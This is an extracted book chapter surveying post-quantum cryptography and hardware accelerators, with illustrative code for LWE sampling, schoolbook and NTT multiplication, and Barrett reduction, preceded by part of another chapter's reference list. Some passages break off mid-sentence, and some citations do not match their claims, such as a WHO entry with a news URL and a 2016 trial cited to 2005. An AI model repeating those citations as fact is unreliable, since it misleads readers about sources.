Sandvine (2019) Global internet phenomena report. https://www.sandvine.com/press-releases/
sandvine-releases-2019-global-internet-phenomena-report
Shafique M, Henkel J (2011) Hardware/software architectures for low-power embedded multime-
dia systems. Springer Science & Business Media, Berlin
Shafique M, Henkel J (2014) Low power design of the next-generation high efficiency video
coding. In: 2014 19th Asia and South Pacific design automation conference (ASP-DAC). IEEE,
pp 274–281
Shafique M, Zatt B (2012) A complexity reduction scheme with adaptive search direction and mode
elimination for multiview video coding. In: 2012 picture coding symposium. IEEE, pp 105–108
Shafique M, Bauer L, Henkel J (2007) An optimized application architecture of the H.264 video
encoder for application specific platforms. In: 2007 IEEE/ACM/IFIP workshop on embedded
systems for real-time multimedia. IEEE, pp 119–124
Shafique M, Bauer L, Henkel J (2008) 3-tier dynamically adaptive power-aware motion estimator for H.264/AVC video encoding. In: Proceeding of the 13th international symposium on low
power electronics and design (ISLPED’08). IEEE, pp 147–152
Shafique M, Bauer L, Henkel J (2009a) A parallel approach for high performance hardware design of intra prediction in H.264/AVC video CODEC. In: 2009 design, automation & test in Europe
conference & exhibition. IEEE, pp 1434–1439
Shafique M, Molkenthin B, Henkel J (2009b) Non-linear rate control for H.264/AVC video encoder
with multiple picture types using image-statistics and motion-based macroblock prioritization.
In: 2009 16th IEEE international conference on image processing (ICIP). IEEE, pp 3429–3432
Shafique M, Bauer L, Henkel J (2010a) enBudget: a run-time adaptive predictive energy-budgeting scheme for energy-aware motion estimation in H.264/MPEG-4 AVC video encoder. In: 2010
design, automation & test in Europe conference & exhibition (DATE 2010). IEEE, pp 1725–
1730
Shafique M, Bauer L, Henkel J (2010b) Optimizing the H.264/AVC video encoder application
structure for reconfigurable and application-specific platforms. J Sig Process Syst 60(2):183–
210
Shafique M, Molkenthin B, Henkel J (2010c) An HVS-based adaptive computational complexity
reduction scheme for H.264/AVC video encoder using prognostic early mode exclusion. In: 2010
design, automation & test in Europe conference & exhibition (DATE 2010). IEEE, pp 1713–
1718
Shafique M, Zatt B, Walter FL, Bampi S, Henkel J (2012) Adaptive power management of on-chip
video memory for multiview video coding. In: DAC design automation conference 2012. IEEE,
pp 866–875
Singh G, Chelini L, Corda S, Awan AJ, Stuijk S, Jordans R, Corporaal H, Boonstra AJ (2019)
Near-memory computing: past, present, and future. Microprocess Microsyst 71:102868
Statista Research Department (2021) Global mobile data traffic share. https://www.statista.com/
statistics/383715/global-mobile-data-traffic-share/
Sullivan GJ, Ohm JR, Han WJ, Wiegand T (2012) Overview of the high efficiency video coding
(HEVC) standard. IEEE Trans Circuits Syst Video Technol 22(12):1649–1668
Teimoori MT, Hanif MA, Ejlali A, Shafique M (2018) Adam: adaptive approximation management
for the non-volatile memory hierarchies. In: 2018 design, automation & test in Europe
conference & exhibition (DATE). IEEE, pp 785–790
Vanne J, Viitanen M, Hamalainen TD, Hallapuro A (2012) Comparative rate-distortion-complexity
analysis of HEVC and AVC video codecs. IEEE Trans Circuits Syst Video Technol 22(12):1885–
1898
Vizzotto BB, Zatt B, Shafique M, Bampi S, Henkel J (2012) A model predictive controller for
frame-level rate control in multiview video coding. In: 2012 IEEE international conference on
multimedia and expo. IEEE, pp 485–490
Wang TC, Mallya A, Liu MY (2021) One-shot free-view neural talking-head synthesis for video
conferencing. In: Proceedings of the IEEE/CVF conference on computer vision and pattern
recognition, pp 10039–10049
Wien M, Bross B (2020) Versatile video coding–algorithms and specification. In: 2020 IEEE
international conference on visual communications and image processing (VCIP). IEEE, pp 1–3
World Health Organization (2021) COVID-19 weekly epidemiological update, edition 46, 29 june
2021. https://www.financialexpress.com/brandwagon/2020-rise-of-paid-subscribers/2172942/
Zadtootaghaj S, Schmidt S, Barman N, Möller S, Martini MG (2018) A classification of video
games based on game characteristics linked to video coding complexity. In: 2018 16th annual
workshop on network and systems support for games (NetGames). IEEE, pp 1–6
Zatt B, Shafique M, Bampi S, Henkel J (2011a) A low-power memory architecture with
application-aware power management for motion & disparity estimation in multiview video
coding. In: 2011 IEEE/ACM international conference on computer-aided design (ICCAD).
IEEE, pp 40–47
Zatt B, Shafique M, Sampaio F, Agostini L, Bampi S, Henkel J (2011b) Run-time adaptive
energy-aware motion and disparity estimation in multiview video coding. In: 2011 48th
ACM/EDAC/IEEE design automation conference (DAC). IEEE, pp 1026–1031
Zhou Y, Tian L, Zhu C, Jin X, Sun Y (2019) Video coding optimization for virtual reality 360-
degree source. IEEE J Sel Top Sig Process 14(1):118–129
Post-Quantum Cryptographic Accelerators
8
Ayesha Khalid and Dur-e-Shahwar Kundi
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
Post-Quantum Cryptography (PQC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
NIST Post-Quantum Cryptography Standardisation Project . . . . . . . . . . . . . . . . . . . . . . . . 240
Classes of Post-Quantum Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
Lattice-Based Cryptography Primitives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Lattices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Computational Problems on Lattices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Average-Case Problems on Standard Lattices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245
Classes of Lattices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 246
Ring-LWE Based PKE Scheme . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
Computationally Intensive Components of LWE (and Variants) . . . . . . . . . . . . . . . . . . . . . 248
Coprocessors for the Lattice-Based Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
General Optimisation Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
Performance Benchmarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
Coprocessors Design Paradigms for Lattice-Based Cryptography . . . . . . . . . . . . . . . . . . . . 256
Optimization Strategies for Implementation of Underlying Components . . . . . . . . . . . . . . 261
Physical Protection of Lattice-Based Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266
Timing Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Power Analysis Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Fault Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 268
Challenges in the Post-Quantum Cryptography Adaptation . . . . . . . . . . . . . . . . . . . . . . . . . . . 269
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
Abstract
Keywords
Introduction
Due to the advances in the field of Quantum computing, the security of today's digital world stands at the brink of a complete and urgent overhaul. This is primarily because of the following two Quantum algorithms that affect the security of modern-day cryptographic algorithms.
• Grover's Algorithm (Grover 1996) affects only the symmetric key algorithms. By virtue of this algorithm, someone with a Quantum computer will be able to find an element in an unordered list of length $N$ in $O(\sqrt{N})$ time, whereas a classical search takes $N/2$ tries on average. Hence, in a post-Quantum world, the key sizes of symmetric key cryptographic algorithms should be doubled, as they retain only half their classical security level, i.e. AES-256 with its 256-bit key would provide only AES-128-equivalent security.
• Shor's Algorithm (Shor 1994) enables a Quantum computer to solve prime factorisation in polynomial time, making RSA-based
cryptosystems unviable. Shor’s Algorithm can also be used to solve the discrete
logarithm problem, leaving the majority of modern public key cryptography
vulnerable and unusable in a post-Quantum world.
The threat posed by the Quantum computers has led to active research into
new cryptographic schemes which would be hard to solve on both classical and
Quantum computers. These schemes are termed generally in scientific literature as
Post-Quantum Cryptography (PQC) or Quantum-Resistant Cryptography (QRC)
or Quantum-safe cryptography. Post-Quantum Cryptography will replace the public
key algorithms that make the backbone of all cryptographic protocols used today.
These algorithms can run on classical computers used today, yet remain secure
against known Quantum computing attacks. The National Institute of Standards and
Technology (NIST) initiated a Post-Quantum Cryptography (PQC) competition in
2016 to standardise Quantum resilient cryptosystems for the key exchange and dig-
ital signatures (Moody 2016). The NIST PQC competition has performed multiple
rounds of evaluation of schemes submitted, with a much lower number of candidate
schemes going forward to the next round. At the moment the 3rd round of the NIST-
PQC is underway with seven finalists scheme and an expected date to conclude in
2022–2024 with a suite of acceptable candidates for standardisation (Moody 2016).
The various Post-Quantum Cryptography schemes under consideration in the
NIST PQC come from a very diverse background of mathematical problems. What
remains common for all of these Quantum-resistant algorithms is the fact that
they are more complex than the currently deployed public key techniques, with
much larger key sizes in comparison, making them at times, impractical for low-
cost devices. This has rightly led to an active research community undertaking
coprocessors for PQC on a range of platforms. This chapter provides a survey of
the challenges for that and the successes achieved. In section “Post-Quantum Cryp-
tography (PQC)”, we discuss major classes of Post-Quantum Cryptography (PQC)
and NIST efforts for PQC standardisation. Evidence and reasons for popularity of
Lattice-based schemes over the others are discussed as well. Section “Lattice-Based
Cryptography Primitives” looks at the fundamental mathematics and some
[Figure: NIST PQC project timeline — start of project; formal call; submission deadline (82 proposals); Round 1 results announced (69 proposals); 1st PQC standardization conference; Round 2 results announced (26 proposals); 2nd PQC standardization conference]
Initial Submissions
There were a total of 82 submissions to the NIST PQC, in the form of PKE (Public Key Encryption), DSS (Digital Signature Schemes) and KEM (Key Encapsulation
Mechanism) schemes. The submissions spanned the five main Quantum-safe fami-
lies, along with some miscellaneous and classical cryptography bases.
In the past few years, the research community has focused on several powerful
cryptographic primitives that are not vulnerable to Quantum attacks. University
research groups, governments worldwide, standards bodies such as the NIST and
the European Telecommunications Standards Institute (ETSI) and companies like
Google, IBM and many others are currently researching Post-Quantum Cryptogra-
phy for this purpose. There are several strands of PQC currently being examined by
the research community.
Code-Based
Code-based cryptography is based on the underlying one-way functions, i.e.
error-correcting codes that are considered to be NP-hard (Wieschebrink 2006).
There are two classic code-based cryptography systems named after Robert
McEliece (McEliece 1978) and Harald Niederreiter (Niederreiter and Xing 2009),
their inventors. For encryption of plain text, the message is encoded either by
adding errors into the message or encoding a message into an error sequence;
error correction during decryption recovers the original message. Code-based
cryptography can provide not only the PKE, KEMs and DSS schemes, but also
other cryptographic functions including identification schemes, random number
generators and hash functions. A challenge surrounding code-based systems is their
very large key sizes which render their implementation impossible on embedded
devices with very limited resources. However, the confidence on them is boosted
by their mathematical roots, e.g. McEliece scheme (and its variants) has remained
secure for 40 years. The Classic McEliece scheme is part of the four PKE finalist
schemes, and BIKE is included in the alternate schemes in the third round of NIST
PQC (NIST 2020).
Multivariate-Based
The hardness of solving non-linear multivariate equation structures over finite fields
is the foundation of Multivariate Cryptography schemes as seeking a solution for
such structures is an NP-complete/-hard problem (Ding and Petzoldt 2017). They
have been more successfully used to build digital signature schemes but not PKE.
Multivariate signatures have the advantage of being fast and having short signature
sizes; however key sizes are large and security proofs are lacking, with security
estimates solely based on known attacks. Rainbow is a Multivariate-based signature
scheme that made it to the finalist list of the 3rd round of NIST PQC, while GeMSS (A
Great Multivariate Short Signature) is included into the alternate signatures list as
well (NIST 2020).
Hash-Based
The security of hash-based signatures relies on the collision resistance of the
underlying hash function. Examples of hash-based schemes are Merkle (Merkle
1989) and XMSS (Buchmann et al. 2011). Their security is well understood; they
offer good performance as well as small signature sizes, making hash-based
signatures a promising Quantum-safe alternative. One of the challenges is creating
practical stateless hash-based schemes. Stateful signature schemes require keeping
track of the signing keys to ensure they are never reused. SPHINCS+ is an example
of a practical stateless hash-based signature that is also included into the alternate
list of the 3rd round of NIST PQC (NIST 2020).
Isogeny-Based
One of the most recent additions to the Quantum-resistant cryptography is based on
the hardness of isogenies over elliptic curves (Jao and De Feo 2011). The Isogeny-
based schemes are attractive due to their short key sizes. Further cryptanalysis
Lattice-Based
Arguably the most popular of the post-Quantum contenders are the Lattice-based
cryptography (LBC) schemes. They are characterised by their associated worst-case hardness problems, upon which both basic primitives, such as public-key encryption (PKE) (Regev 2010), key encapsulation mechanisms (KEM) and digital signature schemes (DSS) (Ducas et al. 2013), and more advanced cryptographic primitives can be built. A popular lattice problem is Learning With Errors (LWE) (Regev
2005; Daniele and Oded 2009); many LWE-based schemes have proven to be just
as, if not more, efficient than existing comparable primitives.
The alternate security primitives to replace the current ones must keep up with
the rapid developments in technology as a whole. For instance, with the societal
shift towards the Internet of Things, ensuring security and privacy for an increasing
number of heterogeneous connected devices is a crucial concern for which the
Quantum-safe cryptographic family must cater for. In this context, the advanced
cryptographic primitives offered by lattices provide the most adaptable and versatile security
solutions. Google trialled the Lattice-based Quantum-safe scheme NewHope in its Chrome browser in 2016 (Braithwaite 2005), and the Lattice-based DSS called BLISS-B has been integrated into the strongSwan IPsec implementation (Steffen et al. 2005).
Lattice-based cryptography schemes stand out for the following reasons:
Lattice-based schemes made up the majority of the NIST PQC initial submissions, with 39% of the 69 Round 1 candidates being Lattice-based in construction. Lattices stayed popular later too, with 12 of the 26 Round 2 candidates and 5 of the 7 Round 3 finalists being Lattice-based.
Fig. 2 NIST PQC Rounds (from left to right for Round 1, 2, 3) percentage composition of the
candidates according to their types. Round 1, 2 and 3 have 69, 26 and 7 (finalists only) candidates
in total with 39%, 46% and 71% candidates Lattice-based in their construction, respectively
Lattices
The shortest vector problem (SVP) (Ajtai 1998) and the closest vector problem
(CVP) (Daniele 2001) are the two basic computational problems on lattices and are the foundation of many LBC schemes.
[Figure: a two-dimensional lattice with basis vectors B0 = (b0, b1) and B1 = (b2, b3), lattice points C = (c0, c1) and D = (d0, d1), and successive minima λ1 = 2B0 − B1 and λ2]
The underlying lattice problems, the CVP and the SVP, are assumed to be non-deterministic polynomial-time (NP)-hard problems, which means they are believed not to be solvable in polynomial time (Ajtai 1996) and are resistant to Quantum computing
attacks. Indeed, many schemes are based on the hardness of approximating the
solution of these problems to within polynomial or super-polynomial factors. It
is common for cryptographic primitives to base their security on average-case
problems which have been proven to be at least as hard as the core lattice problems.
Other than the usage of standard lattice problems like the SVP or CVP, the two most
commonly used average-case problems are the short integer solution (SIS) (Ajtai
1996) and the learning with errors (LWE) (Regev 2005) problems that became the
foundation of many Lattice-based schemes.
• SIS problem: This states that given a random matrix $A \in \mathbb{Z}_q^{m \times n}$ chosen uniformly, it is difficult to find a non-zero short vector $v \in \mathbb{Z}_q^m \setminus \{0\}$ such that $v^T A = 0^T$ and $\|v\| \le \beta$, where $\beta$ represents the norm bound and $q$ the integer modulus.
The SIS problem was first introduced by Ajtai in (1996), and based on it, a public-key cryptosystem was provided by Ajtai and Dwork in (1997). Afterwards, it served as the foundation of the first practical Lattice-based cryptosystem by Hoffstein, Pipher and Silverman in 1998, i.e. the encryption scheme NTRU (Hoffstein et al.
1998). To date the encryption scheme NTRUEncrypt has withstood cryptanalytic
scrutiny provided the parameters are chosen correctly, but the NTRU-based digital
signature scheme NTRUSign is considered broken. However, a modified version of
the signature scheme has been submitted to the NIST post-Quantum call, along with
• LWE problem: This states that given a polynomial number of samples of the form $(a, \langle a, s \rangle + e)$, it is difficult to determine the secret vector $s \in \mathbb{Z}_q^n$, where $n$ is a power-of-two integer defining the input dimension, $q$ is a prime modulus, the vector $a$ is sampled uniformly at random from $\mathbb{Z}_q^n$, and the error $e$ is sampled from an appropriate error distribution.
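As an illustration, the following minimal NumPy sketch generates LWE samples; the parameters are toy and insecure, and the rounded normal below stands in for a proper discrete Gaussian sampler:

```python
import numpy as np

rng = np.random.default_rng()
n, q, m, sigma = 16, 3329, 32, 2.0   # toy parameters, far below secure sizes

s = rng.integers(0, q, size=n)                 # secret vector in Z_q^n
A = rng.integers(0, q, size=(m, n))            # uniform matrix, one row per sample
e = np.rint(rng.normal(0, sigma, size=m)).astype(int)  # small error terms
b = (A @ s + e) % q                            # m samples (a_i, <a_i, s> + e_i)

# The LWE problem: recover s from (A, b). Without e this is plain Gaussian
# elimination; the small errors are what make the problem conjecturally hard.
print(A.shape, b[:4])
```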
Classes of Lattices
There are three classes of lattices that are relevant to LBC schemes, and all these
classes have in common that they require computations with large matrices that
either need a lot of memory or require costly on-the-fly computations.
It is common to add structure to the lattices to reduce this by a square root factor, at
the expense of a stronger security assumption.
• Ideal or ring Lattice-based schemes: An alternative to standard lattices is the use of ideal/ring lattices, which maintain the hardness of the original problem; the security of the constructed schemes is now based on ring variants of the original problems, hence Ring-LWE and Ring-SIS. Examples from NIST's PQC standardisation process are the PKE/KEM schemes NewHope, NTRU and NTRU Prime, as well as the signature schemes qTESLA, Falcon, etc. In ring lattices, the matrix that is used in standard lattices is represented by a single row, and the remaining rows are generated by cyclic shifts of the first row (see the sketch after this list). Therefore, ring Lattice-based schemes are more efficient, as they require less memory, and the main arithmetic operation is polynomial multiplication instead of matrix-vector multiplication. While they are more efficient, the additional structure in the lattice might also be exploitable by attacks. To date, this is not known to introduce any vulnerability to the security, while allowing great benefits in efficiency: not only are the key sizes reduced, but the speed of the underlying operations can also be increased due to this new structure.
• Module Lattice-based schemes: To obtain a trade-off between the efficiency of ideal/ring lattices and the trust in the security of standard lattices, module lattices were introduced. In other words, the module variant provides a middle ground between standard and ideal/ring lattices by reducing the algebraic structure present in ideal lattices, increasing security without compromising much on computational efficiency. The security of module lattices is once again based on variants of the original mathematical problems, hence Module-LWE and Module-SIS. Examples from NIST's PQC standardisation process are the PKE/KEM schemes CRYSTALS-Kyber, SABER and Three Bears, as well as the digital signature scheme (DSS) CRYSTALS-Dilithium. In module lattices the matrix has small dimensions, as defined by a parameter k, and the coefficients of the matrix are no longer simple integers but entire polynomials. The value of k varies among 2, 3 and 4, as in the case of CRYSTALS-Kyber, providing increasing security levels (discussed in section “Performance Benchmarks”) (Bos et al. 2019; Yao et al. 2021).
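To make the storage saving of ring lattices concrete, the sketch below expands a single stored row into the full n × n matrix, so only n coefficients need to be stored instead of n²; the anti-cyclic sign convention here is an illustrative choice corresponding to arithmetic modulo x^n + 1:

```python
import numpy as np

def negacyclic_matrix(first_row: np.ndarray, q: int) -> np.ndarray:
    """Expand one stored row a = (a_0, ..., a_{n-1}) into the n x n matrix
    whose rows are successive negacyclic shifts: coefficients that wrap
    around pick up a minus sign, matching multiplication by x mod x^n + 1."""
    n = len(first_row)
    M = np.empty((n, n), dtype=int)
    row = first_row.copy()
    for i in range(n):
        M[i] = row % q
        row = np.roll(row, 1)
        row[0] = -row[0]          # wrapped coefficient is negated
    return M

a = np.array([1, 2, 3, 4])
print(negacyclic_matrix(a, q=17))
```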
From an architectural point of view, the R-LWE-based PKE algorithm has two computationally intensive components: the sampling of values from a discrete Gaussian-distributed random source, i.e. $D_\sigma$, and the calculation of a series of linear algebraic operations, especially modular polynomial multiplication (×). The algorithmic background of these components is given below.
Knuth-Yao Sampler: this is a tree-based algorithm for discrete Gaussian sampling. If a distribution has N sample points, each of whose probabilities is represented by no more than λ bits, the probabilities can be written as a binary matrix, which in turn defines a binary tree. This tree is called the discrete distribution generating (DDG) tree. It contains λ levels and two types of nodes: internal nodes, which have two children, and terminal nodes, which have none. To create a sample, a “walk” is taken from the root node downwards, going to the right child if the random input bit is 1 and to the left if it is 0. Once a terminal node is reached, the sampler outputs the index number associated with that node. Where RAM was used in the hardware implementation in Howe et al. (2018), this method provided the best results and has a lower area than CDT.
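A software sketch of this random walk follows; the probability matrix is a made-up toy distribution, and real samplers store the matrix in compressed form and must counter the walk's input-dependent running time, as discussed later in this chapter:

```python
import random

def knuth_yao_sample(P):
    """One Knuth-Yao random walk over the DDG tree encoded by the binary
    probability matrix P, where P[r][c] is bit c of Pr[output = r].
    Column bits must represent probabilities summing exactly to 1."""
    d = 0                                    # distance counter in the walk
    for col in range(len(P[0])):
        d = 2 * d + random.getrandbits(1)    # descend one tree level
        for r in range(len(P)):
            d -= P[r][col]
            if d == -1:
                return r                     # terminal node: emit sample r
    raise ValueError("probability matrix columns do not sum to 1")

# Toy distribution: Pr[0] = 1/2 = 0.10b, Pr[1] = Pr[2] = 1/4 = 0.01b.
P = [[1, 0],
     [0, 1],
     [0, 1]]
print([knuth_yao_sample(P) for _ in range(10)])
```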
Polynomial Multiplication
In order to perform encryption and decryption operations, modular polynomial multiplication must be performed, which is quite a computationally intensive task. Generally, it is computed using either a schoolbook polynomial multiplication (SPM) algorithm or the number theoretic transform (NTT).
Schoolbook Algorithm
This is the naive way to calculate the polynomial multiplication. It directly multiplies and accumulates the coefficient products, which makes it quite slow: when used for standard/ideal lattices, the algorithm has a quadratic complexity of $O(n^2)$.
For two polynomials $a, b \in \mathbb{Z}_q[x]/(x^n + 1)$, the product is

$$
c = a \cdot b = \sum_{i=0}^{n-1} \sum_{j=0}^{n-1} (-1)^{\lfloor (i+j)/n \rfloor}\, a_i b_j\, x^{(i+j) \bmod n} \tag{1}
$$
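A direct transcription of Eq. (1) into Python is given below as a reference sketch; hardware implementations stream the coefficients and fold the modular reduction into the accumulation:

```python
def schoolbook_negacyclic(a, b, q, n):
    """Schoolbook product c = a*b mod (x^n + 1, q) following Eq. (1):
    each a_i*b_j lands on x^((i+j) mod n), with a sign flip on wrap-around.
    Requires O(n^2) coefficient multiplications."""
    c = [0] * n
    for i in range(n):
        for j in range(n):
            k = (i + j) % n
            sign = -1 if i + j >= n else 1    # (-1)^floor((i+j)/n)
            c[k] = (c[k] + sign * a[i] * b[j]) % q
    return c

# Example: (1 + x)(1 + x^3) mod (x^4 + 1, 17); the x^4 term wraps to -1
# and cancels the constant term, giving x + x^3.
print(schoolbook_negacyclic([1, 1, 0, 0], [1, 0, 0, 1], q=17, n=4))  # [0, 1, 0, 1]
```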
outlines the protocol utilising the NTT technique. First, each input must be transformed into the NTT domain, as given by line 4, and then the computations required by the R-LWE scheme are performed. For the final decrypted message, the INTT is applied to convert the result back to the normal domain, as given by line 7.
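A toy sketch of this flow is given below, using naive O(n²) transforms for readability; q = 257, n = 4, and ψ = 4 are illustrative parameters satisfying ψⁿ ≡ −1 mod q, not those of any standardised scheme, and deployed implementations use O(n log n) butterfly NTTs:

```python
def ntt_negacyclic_mul(a, b, q=257, n=4, psi=4):
    """Negacyclic product c = a*b in Z_q[x]/(x^n + 1) via the NTT flow:
    twist by powers of psi (a primitive 2n-th root of unity, psi^n = -1
    mod q), transform with omega = psi^2, multiply pointwise, then
    inverse-transform and untwist. Requires Python >= 3.8 for pow() with
    negative exponents (modular inverse)."""
    omega = pow(psi, 2, q)

    def ntt(f):
        tw = [f[j] * pow(psi, j, q) % q for j in range(n)]        # psi-twist
        return [sum(tw[j] * pow(omega, j * k, q) for j in range(n)) % q
                for k in range(n)]

    def intt(F):
        n_inv = pow(n, -1, q)
        g = [n_inv * sum(F[k] * pow(omega, -j * k, q) for k in range(n)) % q
             for j in range(n)]
        return [g[j] * pow(psi, -j, q) % q for j in range(n)]     # untwist

    return intt([x * y % q for x, y in zip(ntt(a), ntt(b))])

# Same toy product as the schoolbook example: (1 + x)(1 + x^3) mod (x^4 + 1)
print(ntt_negacyclic_mul([1, 1, 0, 0], [1, 0, 0, 1]))             # [0, 1, 0, 1]
```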
Barrett’s Reduction
This is not a method of performing the multiplication itself, but a method of improving performance in the modular portion of the multiplication. It was first presented in 1986, after digital signal processors (DSPs) were introduced (Barrett 1986). Barrett's reduction replaces the costly divisions needed to obtain the modulo result with multiplications and a subtraction, as given by Algorithm 4. It includes an estimation of how often the modulus has to be subtracted to obtain a result smaller than the modulus. To accelerate Barrett's modular reduction in hardware, mostly
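Since Algorithm 4 itself is not reproduced here, the following is a generic textbook sketch of Barrett reduction under the assumption k = 2·bitlen(q), not the exact algorithm referenced above:

```python
def barrett_setup(q, k=None):
    """Precompute the Barrett constant m = floor(2^k / q). Choosing
    k = 2 * bitlength(q) covers any product of two values below q."""
    if k is None:
        k = 2 * q.bit_length()
    return k, (1 << k) // q

def barrett_reduce(x, q, k, m):
    """Compute x mod q without a division: estimate the quotient as
    (x * m) >> k, subtract q * estimate, then fix up with at most a
    couple of conditional subtractions (constant-time variants replace
    the loop with masked subtracts)."""
    t = (x * m) >> k            # quotient estimate, never exceeds x // q
    r = x - t * q
    while r >= q:               # executes at most twice
        r -= q
    return r

q = 12289                        # e.g. the NTT-friendly prime used by NewHope
k, m = barrett_setup(q)
x = 12000 * 12001                # a product of two values < q
assert barrett_reduce(x, q, k, m) == x % q
```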
Optimisation of an algorithm always has a specific goal in mind, e.g. to better fit the constraints imposed by a target platform (setting the word size of the architecture to the bit size of the modulus, etc.). The optimisation goal is consequently dependent on the choice of an appropriate target platform with specific features. Lattice-based cryptographic algorithms are generally more data-flow centric than control-flow centric and are consequently better suited for hardware optimisations, since a simple control flow leads to a simple state machine and a higher utilisation of the underlying configurable hardware components. Similarly,
Performance Benchmarks
• Security Strength: For most LBC algorithms, the choice of security strength dictates a trade-off between performance (cost, resources, latency) and the required application security level. In the NIST call for PQC, the proposals invited had to classify their algorithms' security strength as equivalent to the existing NIST standards in symmetric cryptography, i.e. (in order of increasing strength) a security strength of 1, …, 5 implies that any brute-force cryptanalytic effort requires computational resources comparable to (or greater than) those required for a key search on the AES block cipher or for finding a hash collision on SHA-2 (Moody 2016), as shown in Table 2. Security levels 4 and 5 are considered for high-security use cases only, e.g. government, military, long-term data storage, etc. For IoT applications, higher security levels are generally less desirable due to their associated resource overheads.
• Low Resource Usage: For configurable hardware platforms, a reduction in the occupied area generally translates directly to a less expensive and more energy-efficient design. A typical technique is the serial execution of operations sharing the same components. If block RAM units are used, they should be filled to maximum capacity to keep the number of used memory components small, even though that means only one memory access per clock cycle is possible (two for dual-port memories). Similarly, pre-computed tables can be calculated
Table 2 The security levels specified by NIST in their call for submissions (Moody 2016)

Security level   At least as difficult to break as…
1                AES-128
2                SHA-256
3                AES-192
4                SHA-384
5                AES-256
Table 3 Dynamic memory usage (in bytes) and the Clock cycle counts for various leading
Lattice-based PQC NIST 2nd round KEM contestants on an ARM Cortex-M at 168 MHz
Scheme Ref. Operation Cycles Time (ms) Stack (Bytes)
Lattice-based PQC KEMs
Saber Karmakar et al. (2018) Key Gen 1,147,000 7 13,883
(speed) Enc. 1,444,000 9 16,667
Dec. 1,543,000 9 17,763
Saber Karmakar et al. (2018) Key Gen 1,165,000 7 6931
(memory) Enc. 1,530,000 9 7019
Dec. 1,635,000 10 8115
Kyber-1 PQM4 (2018) Key Gen 726,921 4 6456
Enc. 987,864 6 9120
Dec. 1,018,946 6 9928
Kyber-3 PQM4 (2018) Key Gen 1,200,291 7 10,544
Enc. 1,446,284 9 13,720
Dec. 1,477,365 9 14,880
Kyber-5 PQM4 (2018) Key Gen 1,771,729 11 15,664
Enc. 2,142,912 13 19,352
Dec. 2,188,917 13 20,864
FrodoKEM Howe et al. (2018) Key Gen 101,273,066 603 35,484
-AES Enc. 106,933,956 637 63,484
Dec. 107,393,295 639 63,628
FrodoKEM Howe et al. (2018) Key Gen 187,070,653 1114 33,800
-cSHAKE Enc. 253,735,550 1510 57,968
Dec. 254,194,895 1513 58,112
Lattice-based PQC signatures
Falcon-1 Oder et al. (2019) Key Gen. 114,546,135 682 63,652
Sign 80,503,242 479 63,653
Verify 530,900 3 63,654
Falcon-5 Oder et al. (2019) Key Gen. 365,950,978 2178 120,596
Sign 165,800,855 987 120,597
Verify 1,046,700 6 120,598
CRYSTALS Güneysu et al. (2018) Key Gen. 2,320,362 14 50,488
Dilithium Sign 8,348,349 50 86,568
Verify 2,342,191 14 54,800
Classical schemes
ECC-256 UM0586 (2018) Key Gen. 12,713,277 76 –
Sign 13,102,239 78 –
Verify 24,702,099 147 –
RSA-2048 UM0586 (2018) Key Gen. – – –
Sign 228,068,226 1358 –
Verify 61,951,481 369 –
more compact design. Similarly, the routing in ASICs accommodates only the specific logic used, unlike the generic routing components serving multiple FPGA elements. For lightweight IoT end-node devices, high security levels are less desirable due to their associated overhead; consequently, level 3 security or close to it is used, with a minimum of 112 bits generally employed (McKay et al. 2016). Lightweight hardware implementations of symmetric block ciphers require 2–4k Gate Equivalents (GEs) with reasonable performance, while asymmetric cryptography (an ECC processor) involves 10k–12k GEs (with respective security levels of 113 to 131 bits) (Eisenbarth et al. 2007); these now need to be replaced by LBC algorithms with resistance to Quantum attacks. The complexity of LBC calls for much more complex designs with a higher budget.
The state-of-the-art reported ASIC-based LBC implementations are summarised in Table 4. Song et al. (2018) designed the Lattice Encryption Instruction Accelerator (LEIA) chip for an R-LWE scheme, employing an NTT-based multiplier and a discrete Gaussian sampler, with SHA-256 for seed generation. The chip consumes very low energy (119 nJ) for parameters offering 106-bit security, but its 776k GE footprint is far too high for passive IoT devices. Another study (Oder et al. 2019; Nejatollahi et al. 2018) used gem5-aladdin to explore the design space of LBC schemes for domain-specific accelerators ranging from resource-constrained IoT devices to high-performance computing applications. The exploration workflow provides an early estimate of area and power consumption for various parameter sets, targeting both FPGA and ASIC platforms. The minimum achievable gate count for the NTT-based multiplier module (NTT_small) on an ASIC using 45 nm technology is 189k GE, at the cost of a considerably high energy consumption of 596.86 nJ. Basu et al.
